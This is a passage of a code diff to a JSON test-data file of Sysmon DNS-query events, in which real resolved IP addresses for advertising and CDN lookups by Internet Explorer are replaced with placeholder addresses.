@@ -3995,7 +3995,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029890100Z'/\u003e\u003cEventRecordID\u003e131\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eml314.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:35.171.48.231;::ffff:52.206.107.32;::ffff:35.175.80.59;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029890100Z'/\u003e\u003cEventRecordID\u003e131\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eml314.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" 
@@ -4007,7 +4007,7 @@
 "level": "information",
 "event_data": {
 "QueryStatus": "0",
- "QueryResults": "::ffff:35.171.48.231;::ffff:52.206.107.32;::ffff:35.175.80.59;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;",
+ "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:03.894",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}",
@@ -4037,7 +4037,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029900000Z'/\u003e\u003cEventRecordID\u003e132\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.902\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eaa.agkn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:156.154.200.36;::ffff:63.251.88.56;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029900000Z'/\u003e\u003cEventRecordID\u003e132\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.902\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eaa.agkn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" 
@@ -4051,7 +4051,7 @@
 "ProcessId": "2736",
 "QueryName": "aa.agkn.com",
 "QueryStatus": "0",
- "QueryResults": "::ffff:156.154.200.36;::ffff:63.251.88.56;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;",
+ "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:03.902",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}"
@@ -4080,7 +4080,7 @@
 "ProcessId": "2736",
 "QueryName": "s0.2mdn.net",
 "QueryStatus": "0",
- "QueryResults": "type: 5 s0-2mdn-net.l.google.com;::ffff:172.217.10.134;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;",
+ "QueryResults": "type: 5 s0-2mdn-net.l.google.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:03.911",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}"
@@ -4110,7 +4110,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029909900Z'/\u003e\u003cEventRecordID\u003e133\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003es0.2mdn.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 s0-2mdn-net.l.google.com;::ffff:172.217.10.134;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029909900Z'/\u003e\u003cEventRecordID\u003e133\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003es0.2mdn.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 s0-2mdn-net.l.google.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" } 
@@ -4121,7 +4121,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029920400Z'/\u003e\u003cEventRecordID\u003e134\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eb.scorecardresearch.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 b.scorecardresearch.com.edgesuite.net;type: 5 a1294.w20.akamai.net;::ffff:23.50.53.195;::ffff:23.50.53.185;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029920400Z'/\u003e\u003cEventRecordID\u003e134\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eb.scorecardresearch.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 b.scorecardresearch.com.edgesuite.net;type: 5 a1294.w20.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -4150,7 +4150,7 @@
 "ProcessId": "2736",
 "QueryName": "b.scorecardresearch.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 b.scorecardresearch.com.edgesuite.net;type: 5 a1294.w20.akamai.net;::ffff:23.50.53.195;::ffff:23.50.53.185;",
+ "QueryResults": "type: 5 b.scorecardresearch.com.edgesuite.net;type: 5 a1294.w20.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:03.911",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}"
@@ -4175,7 +4175,7 @@
 "ProcessId": "2736",
 "QueryName": "edw.edmunds.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 f2.shared.global.fastly.net;::ffff:151.101.130.2;::ffff:151.101.194.2;::ffff:151.101.2.2;::ffff:151.101.66.2;",
+ "QueryResults": "type: 5 f2.shared.global.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:03.921",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}"
@@ -4193,7 +4193,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.548958100Z'/\u003e\u003cEventRecordID\u003e135\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.921\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eedw.edmunds.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.shared.global.fastly.net;::ffff:151.101.130.2;::ffff:151.101.194.2;::ffff:151.101.2.2;::ffff:151.101.66.2;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.548958100Z'/\u003e\u003cEventRecordID\u003e135\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.921\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eedw.edmunds.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.shared.global.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -4205,7 +4205,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692712500Z'/\u003e\u003cEventRecordID\u003e136\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.101\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.digicert.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692712500Z'/\u003e\u003cEventRecordID\u003e136\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.101\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.digicert.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" @@ -4213,7 +4213,7 @@ "winlog": { "event_data": { "QueryStatus": "0", - "QueryResults": "type: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;", + "QueryResults": "type: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.101", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -4261,7 +4261,7 @@
 "ProcessId": "2736",
 "QueryName": "pre-usermatch.targeting.unrulymedia.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 usermatch.targeting.unrulymedia.com;::ffff:35.167.55.0;::ffff:52.24.219.168;::ffff:52.43.21.209;::ffff:54.200.225.167;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;",
+ "QueryResults": "type: 5 usermatch.targeting.unrulymedia.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:04.137",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}"
@@ -4280,7 +4280,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692750200Z'/\u003e\u003cEventRecordID\u003e137\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.137\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epre-usermatch.targeting.unrulymedia.com\u003c/Data\u003e\u003cData 